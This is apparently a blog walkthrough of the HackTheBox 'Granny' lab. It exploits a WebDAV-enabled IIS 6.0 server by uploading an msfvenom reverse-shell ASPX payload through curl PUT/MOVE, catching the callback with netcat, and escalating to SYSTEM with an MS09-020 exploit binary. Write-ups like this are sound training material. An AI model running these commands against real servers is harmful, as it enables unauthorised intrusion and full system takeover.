Cracking Granny, HackTheBox without Metasploit.

Varun
9 min readJan 21, 2021

--

Recon

The IP of the box is 10.10.10.15, let’s do our regular recon.

┌──(kali㉿kali)-[~/HackTheBox/Granny/recon]
└─$ nmap -sC -sV -p0-1000 10.10.10.15 > results.txt &
┌──(kali㉿kali)-[~/HackTheBox/Granny/recon]
└─$ cat results.txt
Starting Nmap 7.91 ( https://nmap.org ) at 2021-01-20 08:01 EST
Nmap scan report for 10.10.10.15
Host is up (0.17s latency).
Not shown: 1000 filtered ports
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 6.0
| http-methods:
|_ Potentially risky methods: TRACE DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT
|_http-server-header: Microsoft-IIS/6.0
|_http-title: Under Construction
| http-webdav-scan:
| Allowed Methods: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK
| Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
| Server Date: Wed, 20 Jan 2021 15:24:03 GMT
| Server Type: Microsoft-IIS/6.0
|_ WebDAV type: Unknown
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.03 seconds

We can understand that this is a Windows system and MS IIS http 6.0 running at port 80.

What is Microsoft IIS?

This is a web server that runs on MS .NET platform. In the scan it shows that many methods are allowed like PUT and COPY to name a few.

Gaining Access

We can put a reverse shell in the server and try to login using that, but we do have to check which all file types are allowed by the server.

I will be using davtest, this tool can be used to identify which all file types are accepted by the server.

┌──(kali㉿kali)-[~/HackTheBox/Granny/recon]
└─$ davtest -url http://10.10.10.15 > test.txt &
┌──(kali㉿kali)-[~/HackTheBox/Granny/recon]
└─$ cat test.txt
********************************************************
Testing DAV connection
OPEN SUCCEED: http://10.10.10.15
********************************************************
NOTE Random string for this session: jPNif9zgQLl7qEs
********************************************************
Creating directory
MKCOL SUCCEED: Created http://10.10.10.15/DavTestDir_jPNif9zgQLl7qEs
********************************************************
Sending test files
PUT cgi FAIL
PUT txt SUCCEED: http://10.10.10.15/DavTestDir_jPNif9zgQLl7qEs/davtest_jPNif9zgQLl7qEs.txt
PUT cfm SUCCEED: http://10.10.10.15/DavTestDir_jPNif9zgQLl7qEs/davtest_jPNif9zgQLl7qEs.cfm
PUT jsp SUCCEED: http://10.10.10.15/DavTestDir_jPNif9zgQLl7qEs/davtest_jPNif9zgQLl7qEs.jsp
PUT shtml FAIL
PUT asp FAIL
PUT aspx FAIL
PUT pl SUCCEED: http://10.10.10.15/DavTestDir_jPNif9zgQLl7qEs/davtest_jPNif9zgQLl7qEs.pl
PUT jhtml SUCCEED: http://10.10.10.15/DavTestDir_jPNif9zgQLl7qEs/davtest_jPNif9zgQLl7qEs.jhtml
PUT php SUCCEED: http://10.10.10.15/DavTestDir_jPNif9zgQLl7qEs/davtest_jPNif9zgQLl7qEs.php
PUT html SUCCEED: http://10.10.10.15/DavTestDir_jPNif9zgQLl7qEs/davtest_jPNif9zgQLl7qEs.html
********************************************************
Checking for test file execution
EXEC txt SUCCEED: http://10.10.10.15/DavTestDir_jPNif9zgQLl7qEs/davtest_jPNif9zgQLl7qEs.txt
EXEC cfm FAIL
EXEC jsp FAIL
EXEC pl FAIL
EXEC jhtml FAIL
EXEC php FAIL
EXEC html SUCCEED: http://10.10.10.15/DavTestDir_jPNif9zgQLl7qEs/davtest_jPNif9zgQLl7qEs.html
********************************************************
/usr/bin/davtest Summary:
Created: http://10.10.10.15/DavTestDir_jPNif9zgQLl7qEs
PUT File: http://10.10.10.15/DavTestDir_jPNif9zgQLl7qEs/davtest_jPNif9zgQLl7qEs.txt
PUT File: http://10.10.10.15/DavTestDir_jPNif9zgQLl7qEs/davtest_jPNif9zgQLl7qEs.cfm
PUT File: http://10.10.10.15/DavTestDir_jPNif9zgQLl7qEs/davtest_jPNif9zgQLl7qEs.jsp
PUT File: http://10.10.10.15/DavTestDir_jPNif9zgQLl7qEs/davtest_jPNif9zgQLl7qEs.pl
PUT File: http://10.10.10.15/DavTestDir_jPNif9zgQLl7qEs/davtest_jPNif9zgQLl7qEs.jhtml
PUT File: http://10.10.10.15/DavTestDir_jPNif9zgQLl7qEs/davtest_jPNif9zgQLl7qEs.php
PUT File: http://10.10.10.15/DavTestDir_jPNif9zgQLl7qEs/davtest_jPNif9zgQLl7qEs.html
Executes: http://10.10.10.15/DavTestDir_jPNif9zgQLl7qEs/davtest_jPNif9zgQLl7qEs.txt
Executes: http://10.10.10.15/DavTestDir_jPNif9zgQLl7qEs/davtest_jPNif9zgQLl7qEs.html

Since this is a .NET server we need to send the reverse shell as a .aspx file. But the server doesn’t allow transfer of aspx file, still .txt and .html are supported.

Also during the first scan it’s clear that the server allows multiple methods, this can be used to our advantage.

Creating the reverse shell ‘foothold’ with file type aspx and changing it to a txt file.

┌──(kali㉿kali)-[~/HackTheBox/Granny/exploit]
└─$ msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.23 LPORT=53 -f aspx -o foothold.aspx
┌──(kali㉿kali)-[~/HackTheBox/Granny/exploit]
└─$ mv foothold.aspx foothold.txt

Time to send it to the server.

┌──(kali㉿kali)-[~/HackTheBox/Granny/exploit]
└─$ curl -X PUT http://10.10.10.15/foothold.txt --data-binary @foothold.txt

That worked, now to change the filename back to .aspx.

┌──(kali㉿kali)-[~/HackTheBox/Granny/exploit]
└─$ curl -X MOVE --header 'Destination:http://10.10.10.15/foothold.aspx' 'http://10.10.10.15/foothold.txt'

Running a listener at port 53

nc -nvlp 53

Using curl to open the reverse shell.

┌──(kali㉿kali)-[~/HackTheBox/Granny/exploit]
└─$ curl http://10.10.10.15/foothold.aspx

And we got access to the system.

└─$ sudo nc -nvlp 53                                                                                          1 ⨯
[sudo] password for kali:
listening on [any] 53 ...
connect to [10.10.14.23] from (UNKNOWN) [10.10.10.15] 1039
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
c:\windows\system32\inetsrv>
c:\windows\system32\inetsrv>whoami
whoami
nt authority\network service
c:\windows\system32\inetsrv>net user
net user
User accounts for \\GRANNY-------------------------------------------------------------------------------
Administrator ASPNET Guest
IUSR_GRANPA IWAM_GRANPA Lakis
newuser pwn root
SUPPORT_388945a0 test
The command completed successfully.
c:\windows\system32\inetsrv>net user ASPNET
net user ASPNET
User name ASPNET
Full Name ASP.NET Machine Account
Comment Account used for running the ASP.NET worker process (aspnet_wp.exe)
User's comment Account used for running the ASP.NET worker process (aspnet_wp.exe)
Country code 000 (System Default)
Account active Yes
Account expires Never
Password last set 4/12/2017 4:17 PM
Password expires Never
Password changeable 4/12/2017 4:17 PM
Password required No
User may change password No
Workstations allowed All
Logon script
User profile
Home directory
Last logon Never
Logon hours allowed AllLocal Group Memberships *Users
Global Group memberships *None
The command completed successfully.
c:\windows\system32\inetsrv>systeminfo
systeminfo
Host Name: GRANNY
OS Name: Microsoft(R) Windows(R) Server 2003, Standard Edition
OS Version: 5.2.3790 Service Pack 2 Build 3790
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Server
OS Build Type: Uniprocessor Free
Registered Owner: HTB
Registered Organization: HTB
Product ID: 69712-296-0024942-44782
Original Install Date: 4/12/2017, 5:07:40 PM
System Up Time: 0 Days, 1 Hours, 58 Minutes, 27 Seconds
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: X86-based PC
Processor(s): 1 Processor(s) Installed.
[01]: x86 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version: INTEL - 6040000
Windows Directory: C:\WINDOWS
System Directory: C:\WINDOWS\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (GMT+02:00) Athens, Beirut, Istanbul, Minsk
Total Physical Memory: 1,023 MB
Available Physical Memory: 773 MB
Page File: Max Size: 2,470 MB
Page File: Available: 2,304 MB
Page File: In Use: 166 MB
Page File Location(s): C:\pagefile.sys
Domain: HTB
Logon Server: N/A
Hotfix(s): 1 Hotfix(s) Installed.
[01]: Q147222
Network Card(s): N/A

It’s immediately obvious that the user doesn’t have Admin privileges. Time to find a way to do privilege escalation.

More Recon

A tool called Windows-Exploit-Suggester is available, this compares the system with the Microsoft Vulnerability database to find missing patches. In order to scan the system info needs to be provided.

┌──(kali㉿kali)-[~/HackTheBox/Granny/exploit/Windows-Exploit-Suggester]
└─$ ./windows-exploit-suggester.py --database 2021-01-21-mssb.xls --systeminfo info.txt > suggestion.txt &
[1] 8468

┌──(kali㉿kali)-[~/HackTheBox/Granny/exploit/Windows-Exploit-Suggester]
└─$ 1 ⚙
[1] + done ./windows-exploit-suggester.py --database 2021-01-21-mssb.xls --systeminfo >
┌──(kali㉿kali)-[~/HackTheBox/Granny/exploit/Windows-Exploit-Suggester]
└─$ cat suggestion.txt
[*] initiating winsploit version 3.3...
[*] database file detected as xls or xlsx based on extension
[*] attempting to read from the systeminfo input file
[+] systeminfo input file read successfully (ascii)
[*] querying database file for potential vulnerabilities
[*] comparing the 1 hotfix(es) against the 356 potential bulletins(s) with a database of 137 known exploits
[*] there are now 356 remaining vulns
[+] [E] exploitdb PoC, [M] Metasploit module, [*] missing bulletin
[+] windows version identified as 'Windows 2003 SP2 32-bit'
[*]
[M] MS15-051: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (3057191) - Important
[*] https://github.com/hfiref0x/CVE-2015-1701, Win32k Elevation of Privilege Vulnerability, PoC
[*] https://www.exploit-db.com/exploits/37367/ -- Windows ClientCopyImage Win32k Exploit, MSF
[*]
[E] MS15-010: Vulnerabilities in Windows Kernel-Mode Driver Could Allow Remote Code Execution (3036220) - Critical
[*] https://www.exploit-db.com/exploits/39035/ -- Microsoft Windows 8.1 - win32k Local Privilege Escalation (MS15-010), PoC
[*] https://www.exploit-db.com/exploits/37098/ -- Microsoft Windows - Local Privilege Escalation (MS15-010), PoC
[*] https://www.exploit-db.com/exploits/39035/ -- Microsoft Windows win32k Local Privilege Escalation (MS15-010), PoC
[*]
[E] MS14-070: Vulnerability in TCP/IP Could Allow Elevation of Privilege (2989935) - Important
[*] http://www.exploit-db.com/exploits/35936/ -- Microsoft Windows Server 2003 SP2 - Privilege Escalation, PoC
[*]
[E] MS14-068: Vulnerability in Kerberos Could Allow Elevation of Privilege (3011780) - Critical
[*] http://www.exploit-db.com/exploits/35474/ -- Windows Kerberos - Elevation of Privilege (MS14-068), PoC
[*]
[M] MS14-064: Vulnerabilities in Windows OLE Could Allow Remote Code Execution (3011443) - Critical
[*] https://www.exploit-db.com/exploits/37800// -- Microsoft Windows HTA (HTML Application) - Remote Code Execution (MS14-064), PoC
[*] http://www.exploit-db.com/exploits/35308/ -- Internet Explorer OLE Pre-IE11 - Automation Array Remote Code Execution / Powershell VirtualAlloc (MS14-064), PoC
[*] http://www.exploit-db.com/exploits/35229/ -- Internet Explorer <= 11 - OLE Automation Array Remote Code Execution (#1), PoC
[*] http://www.exploit-db.com/exploits/35230/ -- Internet Explorer < 11 - OLE Automation Array Remote Code Execution (MSF), MSF
[*] http://www.exploit-db.com/exploits/35235/ -- MS14-064 Microsoft Windows OLE Package Manager Code Execution Through Python, MSF
[*] http://www.exploit-db.com/exploits/35236/ -- MS14-064 Microsoft Windows OLE Package Manager Code Execution, MSF
[*]
[M] MS14-062: Vulnerability in Message Queuing Service Could Allow Elevation of Privilege (2993254) - Important
[*] http://www.exploit-db.com/exploits/34112/ -- Microsoft Windows XP SP3 MQAC.sys - Arbitrary Write Privilege Escalation, PoC
[*] http://www.exploit-db.com/exploits/34982/ -- Microsoft Bluetooth Personal Area Networking (BthPan.sys) Privilege Escalation
[*]
[M] MS14-058: Vulnerabilities in Kernel-Mode Driver Could Allow Remote Code Execution (3000061) - Critical
[*] http://www.exploit-db.com/exploits/35101/ -- Windows TrackPopupMenu Win32k NULL Pointer Dereference, MSF
[*]
[E] MS14-040: Vulnerability in Ancillary Function Driver (AFD) Could Allow Elevation of Privilege (2975684) - Important
[*] https://www.exploit-db.com/exploits/39525/ -- Microsoft Windows 7 x64 - afd.sys Privilege Escalation (MS14-040), PoC
[*] https://www.exploit-db.com/exploits/39446/ -- Microsoft Windows - afd.sys Dangling Pointer Privilege Escalation (MS14-040), PoC
[*]
[E] MS14-035: Cumulative Security Update for Internet Explorer (2969262) - Critical
[E] MS14-029: Security Update for Internet Explorer (2962482) - Critical
[*] http://www.exploit-db.com/exploits/34458/
[*]
[E] MS14-026: Vulnerability in .NET Framework Could Allow Elevation of Privilege (2958732) - Important
[*] http://www.exploit-db.com/exploits/35280/, -- .NET Remoting Services Remote Command Execution, PoC
[*]
[M] MS14-012: Cumulative Security Update for Internet Explorer (2925418) - Critical
[M] MS14-009: Vulnerabilities in .NET Framework Could Allow Elevation of Privilege (2916607) - Important
[E] MS14-002: Vulnerability in Windows Kernel Could Allow Elevation of Privilege (2914368) - Important
[E] MS13-101: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (2880430) - Important
[M] MS13-097: Cumulative Security Update for Internet Explorer (2898785) - Critical
[M] MS13-090: Cumulative Security Update of ActiveX Kill Bits (2900986) - Critical
[M] MS13-080: Cumulative Security Update for Internet Explorer (2879017) - Critical
[M] MS13-071: Vulnerability in Windows Theme File Could Allow Remote Code Execution (2864063) - Important
[M] MS13-069: Cumulative Security Update for Internet Explorer (2870699) - Critical
[M] MS13-059: Cumulative Security Update for Internet Explorer (2862772) - Critical
[M] MS13-055: Cumulative Security Update for Internet Explorer (2846071) - Critical
[M] MS13-053: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Remote Code Execution (2850851) - Critical
[M] MS13-009: Cumulative Security Update for Internet Explorer (2792100) - Critical
[E] MS12-037: Cumulative Security Update for Internet Explorer (2699988) - Critical
[*] http://www.exploit-db.com/exploits/35273/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5., PoC
[*] http://www.exploit-db.com/exploits/34815/ -- Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5.0 Bypass (MS12-037), PoC
[*]
[M] MS11-080: Vulnerability in Ancillary Function Driver Could Allow Elevation of Privilege (2592799) - Important
[E] MS11-011: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (2393802) - Important
[M] MS10-073: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Elevation of Privilege (981957) - Important
[M] MS10-061: Vulnerability in Print Spooler Service Could Allow Remote Code Execution (2347290) - Critical
[M] MS10-015: Vulnerabilities in Windows Kernel Could Allow Elevation of Privilege (977165) - Important
[M] MS10-002: Cumulative Security Update for Internet Explorer (978207) - Critical
[M] MS09-072: Cumulative Security Update for Internet Explorer (976325) - Critical
[M] MS09-065: Vulnerabilities in Windows Kernel-Mode Drivers Could Allow Remote Code Execution (969947) - Critical
[M] MS09-053: Vulnerabilities in FTP Service for Internet Information Services Could Allow Remote Code Execution (975254) - Important
[M] MS09-020: Vulnerabilities in Internet Information Services (IIS) Could Allow Elevation of Privilege (970483) - Important
[M] MS09-004: Vulnerability in Microsoft SQL Server Could Allow Remote Code Execution (959420) - Important
[M] MS09-002: Cumulative Security Update for Internet Explorer (961260) (961260) - Critical
[M] MS09-001: Vulnerabilities in SMB Could Allow Remote Code Execution (958687) - Critical
[M] MS08-078: Security Update for Internet Explorer (960714) - Critical
[*] done

That is a lot of vulnerabilites, now to pick one.

Since this is an IIS server, I am going to try the MS09–20. The exploit is present in this repo. I will send the file to server in the same way as the reverse shell.

┌──(kali㉿kali)-[~/GitRepos/windows-kernel-exploits/MS09-020/MS09-020-KB970483-CVE-2009-1535-IIS6]
└─$ ls
IIS6.0.exe
┌──(kali㉿kali)-[~/GitRepos/windows-kernel-exploits/MS09-020/MS09-020-KB970483-CVE-2009-1535-IIS6]
└─$ curl -X PUT http://10.10.10.15/exploit.txt --data-binary @IIS6.0.exe
┌──(kali㉿kali)-[~/GitRepos/windows-kernel-exploits/MS09-020/MS09-020-KB970483-CVE-2009-1535-IIS6]
└─$ curl -X MOVE --header 'Destination:http://10.10.10.15/exploit.exe' 'http://10.10.10.15/exploit.txt'

Now to check if it works! Logging into the server.

C:\>dir /S /P "exploit.exe"
dir /S /P "exploit.exe"
Volume in drive C has no label.
Volume Serial Number is 246C-D7FE
Directory of C:\Inetpub\wwwroot01/21/2021 06:43 PM 211,716 exploit.exe
1 File(s) 211,716 bytes
Total Files Listed:
1 File(s) 211,716 bytes
0 Dir(s) 18,125,094,912 bytes free
C:\>cd Inetpub\wwwroot
cd Inetpub\wwwroot
C:\Inetpub\wwwroot>exploit.exe whoami
exploit.exe whoami
nt authority\system
-------------------------------------------
kindle-->Got WMI process Pid: 1396
begin to try
kindle-->Found token SYSTEM
kindle-->Command:whoami

Yes, I got root access.

To get the shell with root privilege was pretty easy 😂

C:\Inetpub\wwwroot>
C:\Inetpub\wwwroot>exploit.exe cmd.exe
exploit.exe cmd.exe
Microsoft Windows [Version 5.2.3790]
(C) Copyright 1985-2003 Microsoft Corp.
C:\Inetpub\wwwroot>whoami
whoami
-------------------------------------------
kindle-->Got WMI process Pid: 1396
begin to try
kindle-->Found token SYSTEM
kindle-->Command:cmd.exe
nt authority\system
C:\Inetpub\wwwroot>

Flags

C:\Documents and Settings>cd Lakis/Desktop
cd Lakis/Desktop
C:\Documents and Settings\Lakis\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 246C-D7FE
Directory of C:\Documents and Settings\Lakis\Desktop04/12/2017 09:19 PM <DIR> .
04/12/2017 09:19 PM <DIR> ..
04/12/2017 09:20 PM 32 user.txt
1 File(s) 32 bytes
2 Dir(s) 18,125,111,296 bytes free
C:\Documents and Settings\Lakis\Desktop>type user.txtC:\Documents and Settings>cd Administrator\Desktop
cd Administrator\Desktop
C:\Documents and Settings\Administrator\Desktop>type root.txt

That is how I solved Granny. Took me some time but was worth it!!

--

--

No responses yet